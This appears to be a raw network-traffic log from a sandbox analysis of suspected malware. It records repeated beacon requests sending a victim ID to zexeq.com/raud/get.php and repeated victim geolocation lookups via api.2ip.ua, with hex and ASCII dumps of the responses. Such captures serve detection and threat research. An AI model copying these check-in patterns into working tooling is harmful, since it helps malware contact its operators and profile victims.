Jan 26, 2024 01:36:00.286905050 CET	136	OUT	GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
Jan 26, 2024 01:36:00.406033993 CET	1286	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jan 2024 00:36:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:00 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ== Cache-Control: no-cache Accept-CH: sec-ch-prefers-color-scheme Critical-CH: sec-ch-prefers-color-scheme Vary: sec-ch-prefers-color-scheme Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
Jan 26, 2024 01:36:00.406092882 CET	457	IN	Data Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32 Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5MzYwLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
Jan 26, 2024 01:36:00.406128883 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 26, 2024 01:36:05.450329065 CET	198	OUT	GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
Jan 26, 2024 01:36:05.569555998 CET	1286	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jan 2024 00:36:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:05 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ== Cache-Control: no-cache Accept-CH: sec-ch-prefers-color-scheme Critical-CH: sec-ch-prefers-color-scheme Vary: sec-ch-prefers-color-scheme Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
Jan 26, 2024 01:36:05.569621086 CET	457	IN	Data Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32 Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5MzY1LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
Jan 26, 2024 01:36:05.569658995 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 26, 2024 01:36:10.606481075 CET	198	OUT	GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
Jan 26, 2024 01:36:10.725145102 CET	1286	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jan 2024 00:36:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:10 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ== Cache-Control: no-cache Accept-CH: sec-ch-prefers-color-scheme Critical-CH: sec-ch-prefers-color-scheme Vary: sec-ch-prefers-color-scheme Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
Jan 26, 2024 01:36:10.725246906 CET	457	IN	Data Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32 Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5MzcwLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
Jan 26, 2024 01:36:10.725286961 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 26, 2024 01:36:15.746963024 CET	198	OUT	GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
Jan 26, 2024 01:36:15.865904093 CET	1286	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jan 2024 00:36:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:15 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ== Cache-Control: no-cache Accept-CH: sec-ch-prefers-color-scheme Critical-CH: sec-ch-prefers-color-scheme Vary: sec-ch-prefers-color-scheme Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
Jan 26, 2024 01:36:15.865948915 CET	457	IN	Data Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32 Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5Mzc1LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
Jan 26, 2024 01:36:15.865986109 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-26 00:35:57 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-01-26 00:35:58 UTC	895	IN	HTTP/1.1 200 OK Date: Fri, 26 Jan 2024 00:35:58 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q3OOOhb8HiVTivBNRbGiJjUkqgGV7lddOzhoZcng%2FufICfO7r2WEkysko46j58hp7gYd9BsNwcLHTQdmcvBgu%2Bzdep%2FD%2FGJXp73%2BqXyBC7fA0W9au0Xz7pLfpy%2Fb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 84b4adcebccead80-ATL alt-svc: h3=":443"; ma=86400
2024-01-26 00:35:58 UTC	461	IN	Data Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
2024-01-26 00:35:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-26 00:35:59 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-01-26 00:35:59 UTC	889	IN	HTTP/1.1 200 OK Date: Fri, 26 Jan 2024 00:35:59 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JpXoGHjqVnHe5oqaAVBYqd9LbtMD15k%2FJmz6GEEcGMKYtWYSDM1t744Q%2FaHNEgYOBrJo3HdCEj4zire3p21kr6xheEbqXF%2FEXlp3VbFol8Ojui6ITcBONKNtnZPv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 84b4add84dfa0719-ATL alt-svc: h3=":443"; ma=86400
2024-01-26 00:35:59 UTC	461	IN	Data Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
2024-01-26 00:35:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-26 00:36:00 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-01-26 00:36:01 UTC	887	IN	HTTP/1.1 200 OK Date: Fri, 26 Jan 2024 00:36:00 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vUyG6sXhlL8Wz7XMVGvv8yZIifLHb79TGnU8GbvGjSSFxAUWPSDeH1%2B4dMf80S8HVkajEFMJX1HQ4p2tWMo9rUHVc8qzicqqHj2VBCg6HJCgmzqseX4gh3VWD%2B9m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 84b4ade00ddf53aa-ATL alt-svc: h3=":443"; ma=86400
2024-01-26 00:36:01 UTC	461	IN	Data Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
2024-01-26 00:36:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-26 00:36:07 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
